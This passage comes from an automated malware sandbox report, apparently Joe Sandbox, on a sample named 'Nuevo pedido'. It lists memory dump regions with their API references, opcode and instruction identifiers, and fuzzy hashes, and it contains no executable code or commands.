                                                                                                                                            • Instruction Fuzzy Hash: 4D2115B1D002198FDB14DF9AC844BEEFBF4EB88320F14842AD458A7250D774A944CFA5
                                                                                                                                            APIs
                                                                                                                                            • MessageBoxW.USER32(?,00000000,00000000,?,?,?,?,?,?,?,06D88245,?,?,?), ref: 06D8B28D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Message
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2030045667-0
                                                                                                                                            • Opcode ID: 599d633804bcfd91ae85b6f77e4be1e5305141d32383856a27790294e2d16774
                                                                                                                                            • Instruction ID: d83024261551d6f008b186b8af0ec43cc94ed3907f18bef6e32d2b0281611d13
                                                                                                                                            • Opcode Fuzzy Hash: 599d633804bcfd91ae85b6f77e4be1e5305141d32383856a27790294e2d16774
                                                                                                                                            • Instruction Fuzzy Hash: CE21F3B5D013099FCB20DF9AD888BDEFBB5FB48310F10842EE859A7200C375A944CBA4
                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 06D8A025
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Initialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                            • Opcode ID: 939c8d5f7110d35387c64b61862937c5ee4b61f8aa4e4add8282314901a7363d
                                                                                                                                            • Instruction ID: 4517e3d3f79355716901020241954ee6ba7cd59c68858488b75c9f42744278f1
                                                                                                                                            • Opcode Fuzzy Hash: 939c8d5f7110d35387c64b61862937c5ee4b61f8aa4e4add8282314901a7363d
                                                                                                                                            • Instruction Fuzzy Hash: AF1145B48003489FCB20DF9AD949BCEFFF8EB48324F20845AE459A3250C735A544CFA5
                                                                                                                                            APIs
                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 06D8A025
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4154580641.0000000006D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D80000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_6d80000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Initialize
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2538663250-0
                                                                                                                                            • Opcode ID: b4a8baf6e942ed361b04fccd586fdc3bbf6f1038489c5b06fe3ac4dcdc892b41
                                                                                                                                            • Instruction ID: a4a3aaaef81eb7d1127b850c1ff49caba0f5a5e1b0f3bf11a46061dc04a6009a
                                                                                                                                            • Opcode Fuzzy Hash: b4a8baf6e942ed361b04fccd586fdc3bbf6f1038489c5b06fe3ac4dcdc892b41
                                                                                                                                            • Instruction Fuzzy Hash: 811142B08003488FCB20EF9AC548BDEFBF8EB48324F24845AE559A7310D375A940CFA4
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            • Opcode ID: fb9960ee8f077ecec01994602eb64243e8083c6470b46c8b80af37a56c551f0a
                                                                                                                                            • Instruction ID: fddfbaf6fcd562b1f0f302d7a902a16baaeca8757b31a1dd88dc28d453d22c37
                                                                                                                                            • Opcode Fuzzy Hash: fb9960ee8f077ecec01994602eb64243e8083c6470b46c8b80af37a56c551f0a
                                                                                                                                            • Instruction Fuzzy Hash: 031122B1D002898FCB20CF9AD448ACEFBF4AB48324F20855AE469A7250C338A540CFA5
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4156933760.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_7370000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: DispatchMessage
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2061451462-0
                                                                                                                                            • Opcode ID: 62ce11119f88f473a17b1ab474a1ddef2df10fb6ee184d3170fe80221d64962a
                                                                                                                                            • Instruction ID: 693c9b71515884f3c27bc9a7e8cf7a371b33c8ec9f80ff317734ff1aee351b65
                                                                                                                                            • Opcode Fuzzy Hash: 62ce11119f88f473a17b1ab474a1ddef2df10fb6ee184d3170fe80221d64962a
                                                                                                                                            • Instruction Fuzzy Hash: 221112B5C00249CFCB20DF9AD444BDEFBF4EB48324F10842AD458A3210D379A544CFA5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 4fc3758418413e31ac174905b6b301b86b49c8ec78d592fc9a53850220f07970
                                                                                                                                            • Instruction ID: 0d6d56da97414fca57c1ce7b4fcb2aecc8e2f13a704d2f82143ec65caf445494
                                                                                                                                            • Opcode Fuzzy Hash: 4fc3758418413e31ac174905b6b301b86b49c8ec78d592fc9a53850220f07970
                                                                                                                                            • Instruction Fuzzy Hash: 05129C358E324B8FE2413F30E6BC56AFB62FB1F7A3745AE01E11BC9445DB7114688A61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 71a1447c653792ffc3fe33064c2f263cc5f82160ce8c802bebcda388ac9bd9f1
                                                                                                                                            • Instruction ID: ac42cee8f3d6fbd6fbd8dac7bc92b30cb1eb4242d48431bc67e882eb8c5870d0
                                                                                                                                            • Opcode Fuzzy Hash: 71a1447c653792ffc3fe33064c2f263cc5f82160ce8c802bebcda388ac9bd9f1
                                                                                                                                            • Instruction Fuzzy Hash: 0B814731A016059FCB11CF6CC880AAABBB6FF853A4B14C667EA18D7355D731F951CBA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8b54973130019969946659d32256aaa2bf18531f9ed54d445946d5b44cf0f1ad
                                                                                                                                            • Instruction ID: 412094ee2b7f8ac516007b9e8dc18032bf1689aea36ed7160c661f4b62dc823b
                                                                                                                                            • Opcode Fuzzy Hash: 8b54973130019969946659d32256aaa2bf18531f9ed54d445946d5b44cf0f1ad
                                                                                                                                            • Instruction Fuzzy Hash: B3717C34B006058FCB14DF68C888A6E7BE6BF997C5B1500AAEA02DB370DB70DC41DB60
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 6ba3be57fb15f4b1e6befd630ce496b3d750d75d49dbbc1090bc2f9ea3aaf96f
                                                                                                                                            • Instruction ID: fae5639f7202c6b996e092f172501f69f0cc18e71e3f5b58b420313c6dfb9fe5
                                                                                                                                            • Opcode Fuzzy Hash: 6ba3be57fb15f4b1e6befd630ce496b3d750d75d49dbbc1090bc2f9ea3aaf96f
                                                                                                                                            • Instruction Fuzzy Hash: 82518374E01218DFDB44DFAAD5849DDBBF2BF89300F20816AE809AB364DB31A945CF50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 232ab242e93a26c6ba2857cc986a7e82fd62f5f2b3a9b16845276000c84a1e71
                                                                                                                                            • Instruction ID: 71b9d7c978e04ce1949646b594d8024de360cabe3978555e977ee12cb4e1a6e6
                                                                                                                                            • Opcode Fuzzy Hash: 232ab242e93a26c6ba2857cc986a7e82fd62f5f2b3a9b16845276000c84a1e71
                                                                                                                                            • Instruction Fuzzy Hash: 6F51A875E01208CFCB48DFA9D58499DBBF2FF89314B209169E805AB364DB35AD42CF51
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7eb5e6de3d6c4f547047d9d9b900324b5af64e7b215ca92aec9031ac9f68f0e5
                                                                                                                                            • Instruction ID: c4fbf05a8222ebdb85d0c90cc62d18fdaf2b0afec591ec25230721d380a319a9
                                                                                                                                            • Opcode Fuzzy Hash: 7eb5e6de3d6c4f547047d9d9b900324b5af64e7b215ca92aec9031ac9f68f0e5
                                                                                                                                            • Instruction Fuzzy Hash: 1841A231A04249DFCF11CFA8C944B9EBFB2FF49394F068566EA159B2A1D332E914CB50
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: ed76baabe92eff7a504a06804e2aefdd1f8c23dce778e2520efd5458a7a98e32
                                                                                                                                            • Instruction ID: a13b931e0402d529b3e9ea56ca62901f0ceab96280e9c74e3d39da6a59b44adb
                                                                                                                                            • Opcode Fuzzy Hash: ed76baabe92eff7a504a06804e2aefdd1f8c23dce778e2520efd5458a7a98e32
                                                                                                                                            • Instruction Fuzzy Hash: BF41FE31A002489FCB149F64C804BAEFBB2FB84344F04846AE905DB252DB79DD95CFA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8d37ec0c8845dd013b9c96cf5eec1b09a4cd77e5549e27eec53a74f91908fa65
                                                                                                                                            • Instruction ID: c7391bf1deb632b529b818d490f85497869226912822322124245f829961844e
                                                                                                                                            • Opcode Fuzzy Hash: 8d37ec0c8845dd013b9c96cf5eec1b09a4cd77e5549e27eec53a74f91908fa65
                                                                                                                                            • Instruction Fuzzy Hash: EF318F31A0110EDFCF119FA5D854AAF7BA3FB88685F448429FE158B250CB35CD62CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74cfa2d2c247a39d926f37e7fb5934b1fd7d675f75ee29033d2680f384f3e66a
                                                                                                                                            • Instruction ID: 95db4f5a03390eb5ec1a6332e9d6ec3679184ab6ae4e5384d25cd6bc42cf536f
                                                                                                                                            • Opcode Fuzzy Hash: 74cfa2d2c247a39d926f37e7fb5934b1fd7d675f75ee29033d2680f384f3e66a
                                                                                                                                            • Instruction Fuzzy Hash: D841EF74E05328CFCB64DF74D858BADBBB2AF4A304F1045AAD40EA7240DB349A81CF01
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7a0119ad9ee83de13a5ce978e3f05a874e725a2563f770b9b3706fced3d7d777
                                                                                                                                            • Instruction ID: d66df0777f00f412f69eb4a37be0d139329c5c96f2821b3d54052fe4395d2878
                                                                                                                                            • Opcode Fuzzy Hash: 7a0119ad9ee83de13a5ce978e3f05a874e725a2563f770b9b3706fced3d7d777
                                                                                                                                            • Instruction Fuzzy Hash: 3321B031B002058BDB245E75C65C73E7697AFC87D8F14847AD606CB798EBA5CC42E381
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 910bbb0246a9c04f70284be4e181dbaec167d7d8b27f33ec048bd6d9bb741a9e
                                                                                                                                            • Instruction ID: 5c34b1e1f097d45052fdc7e4be3c3c771b02292025ef1f77f3c2249ec6ef8584
                                                                                                                                            • Opcode Fuzzy Hash: 910bbb0246a9c04f70284be4e181dbaec167d7d8b27f33ec048bd6d9bb741a9e
                                                                                                                                            • Instruction Fuzzy Hash: 0921F235B019158FC7269B2AC45492EB7A7FFC97D5709846AEA1ACB394CF30DC02CB80
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e6153596e7b2a2bf0a9442be2434066f25251e71d232fc6e93588a12cebce434
                                                                                                                                            • Instruction ID: a412855d321004499d6de52e9692075192f55792778d2a70b5e84794f1b3d278
                                                                                                                                            • Opcode Fuzzy Hash: e6153596e7b2a2bf0a9442be2434066f25251e71d232fc6e93588a12cebce434
                                                                                                                                            • Instruction Fuzzy Hash: 48218E75E001059FCB14DF34C490AAE77B5EB9D2A4B14805AE94A9B340DB38EE83CBD2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138410317.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2e9d000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d8be96f248633910ebc81d8dd915a147e8b3db373302e68b011ad054309934d2
                                                                                                                                            • Instruction ID: e535fb550f78738817e851bfcf29ad953374bf5b13f383c5ac2f60f785bb4d50
                                                                                                                                            • Opcode Fuzzy Hash: d8be96f248633910ebc81d8dd915a147e8b3db373302e68b011ad054309934d2
                                                                                                                                            • Instruction Fuzzy Hash: D221F272684200DFDF05EF15DDC4B26BBA5FB88318F20C56EE8094B256C37AD446CA71
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 1d9b10a6370102b054f55d4156b3c22804401af009f18d4924af0c4588683468
                                                                                                                                            • Instruction ID: 9e504e56fae4f510ff34334114726dc67d15383711d71503e4f8a9752f39a4e7
                                                                                                                                            • Opcode Fuzzy Hash: 1d9b10a6370102b054f55d4156b3c22804401af009f18d4924af0c4588683468
                                                                                                                                            • Instruction Fuzzy Hash: BC21C231A0524DCFCB119F64D848BAA7BA2FB94694F44846AEA058F344CB34CD62CBA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 56fe4d6e12f6bc27ef2573ebbbfb33bb0b3c785723ad376eb468ac76534a8a24
                                                                                                                                            • Instruction ID: b966598e2ab8cd8606e8660343767ae9b1087c071e06cac56976e22632bc3c06
                                                                                                                                            • Opcode Fuzzy Hash: 56fe4d6e12f6bc27ef2573ebbbfb33bb0b3c785723ad376eb468ac76534a8a24
                                                                                                                                            • Instruction Fuzzy Hash: 1B31B578E01208CFCB44DFA9E58889DBBB2FF49305B204069E819AB324DB35AD85CF01
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 055fd289f4ed021ead795d9abe0c18bbd14301d6aee02e1761b48466baf5af1b
                                                                                                                                            • Instruction ID: 8b87dfcaf5fc307c6c9b65c68d27afc8c98b2d335693211030506af48df82c5e
                                                                                                                                            • Opcode Fuzzy Hash: 055fd289f4ed021ead795d9abe0c18bbd14301d6aee02e1761b48466baf5af1b
                                                                                                                                            • Instruction Fuzzy Hash: DF218B30E0124D9FCB05CFB5D550AEEBFB6EF49245F14846AE511E6390DB34D981CB20
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 0ea62a16fc3df535a2e708be45619c80b02ce9df95300fcc7cf4ebf4c11adf8e
                                                                                                                                            • Instruction ID: 5d6dfd2d0eaccb51987b2348118375ebe385563f8d9b5ca3242579de7783910d
                                                                                                                                            • Opcode Fuzzy Hash: 0ea62a16fc3df535a2e708be45619c80b02ce9df95300fcc7cf4ebf4c11adf8e
                                                                                                                                            • Instruction Fuzzy Hash: E131EE74E05319CFCB64DF64D968BADBBB2AF49300F1045AAD50AA7250DB745A81CF12
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e6941cddffbfe983368cc8516ed43a101b9bf84c59a91653e4ebdf1fa313e978
                                                                                                                                            • Instruction ID: fe81a972a5accb9be447dcd90c5c84848b547b2cae334a9ae098c9e06b1a9c1a
                                                                                                                                            • Opcode Fuzzy Hash: e6941cddffbfe983368cc8516ed43a101b9bf84c59a91653e4ebdf1fa313e978
                                                                                                                                            • Instruction Fuzzy Hash: 98116D76B012089FCB149F68DC54BDEBBB6FB8C754F15442AEA16E7290DB719C10CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: fd465c0b0f8046da10591e3d243a37206a42b1778374f8379144bd55cb742c36
                                                                                                                                            • Instruction ID: 8c396018b653c36e6f4d677e015057be69eaf9e6c3c2306e827659faff155b10
                                                                                                                                            • Opcode Fuzzy Hash: fd465c0b0f8046da10591e3d243a37206a42b1778374f8379144bd55cb742c36
                                                                                                                                            • Instruction Fuzzy Hash: 6C11A135B01A169FC7155B3AD49892EB7AAFFC96E53094479EA1ACB350CF21DC02CB90
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138410317.0000000002E9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E9D000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2e9d000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction ID: 3021201dd6924e8d706fd2b3e8aad66602473bedea0fa7c6ce1bd54feb9b638b
                                                                                                                                            • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                            • Instruction Fuzzy Hash: 4F119D76544280DFDB06DF24D9C4B15BFB1FB88318F24C6AAD8494B656C33AD44ACF61
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 8105930287d803d83705fe6e9167a64f7c002ca2b1f436dd466e1680a762fc9d
                                                                                                                                            • Instruction ID: df97f16e7f51afcb188da21bbc9c6bd893a8aef0c9c85ecc8ddd14367bd985d5
                                                                                                                                            • Opcode Fuzzy Hash: 8105930287d803d83705fe6e9167a64f7c002ca2b1f436dd466e1680a762fc9d
                                                                                                                                            • Instruction Fuzzy Hash: 7401D833B001196BCB019D98E8507EF3BDBEBC8690F19802AFA05D7284DE71CC119790
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: a4d6460ded6ea499ba1c99a5ca85cc7c69a43459a079e059af448af53c7e16c6
                                                                                                                                            • Instruction ID: bb6c1e879b0a8a2db05a956e26c5ddc956f7b3d74c72761a5019ac3d7d44d6bd
                                                                                                                                            • Opcode Fuzzy Hash: a4d6460ded6ea499ba1c99a5ca85cc7c69a43459a079e059af448af53c7e16c6
                                                                                                                                            • Instruction Fuzzy Hash: 641199B5D0120E8FCB40EFA9D9845EEBBF1FB49304F10566AD819F2210EB315A95CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_2f70000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 9a0d1203b85771418592095e627364bb5130d7c98666103fa797b42571493ee6
                                                                                                                                            • Instruction ID: 656790fb5949b78194cae217507e9458d9d1e172435308cb866bfd54e66ee076
                                                                                                                                            • Opcode Fuzzy Hash: 9a0d1203b85771418592095e627364bb5130d7c98666103fa797b42571493ee6
                                                                                                                                            • Instruction Fuzzy Hash: 83F0C231B006145B87155A3ED454A2EB69EEFC8AE930A406BEA09C7361EF20CC028380
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138112044.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_15cd000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: d1ee56ccdca4e75146e19b23275dbd7339b79627f2cba5ce614df98efc8c88d3
                                                                                                                                            • Instruction ID: 4b9f1a4e7ea14a5ed809c8dc40726ff794edb7b868360ec0f1abf8e1756353bc
                                                                                                                                            • Opcode Fuzzy Hash: d1ee56ccdca4e75146e19b23275dbd7339b79627f2cba5ce614df98efc8c88d3
                                                                                                                                            • Instruction Fuzzy Hash: C6012C30109780AFD322CF15C884C62BFB9FF8666071A84DAE8459F663C635EC05CBA1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138112044.00000000015CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 015CD000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_9_2_15cd000_Nuevo pedido.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f430619fb758cfd748629d41b853c825ca01e1bb6c8e3cdcb4f1142e2295cfa4
                                                                                                                                            • Instruction ID: 69e7ddc4b9659407a442203bdb103c27c552d306f1ebf0aa76782142ef25f43c
                                                                                                                                            • Opcode Fuzzy Hash: f430619fb758cfd748629d41b853c825ca01e1bb6c8e3cdcb4f1142e2295cfa4
                                                                                                                                            • Instruction Fuzzy Hash: A5F0FF75600604AFD7208F4AD885C67FBBDFBC4670715C56AE84A5B611D671EC42CEA0
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000009.00000002.4138915148.0000000002F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F70000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
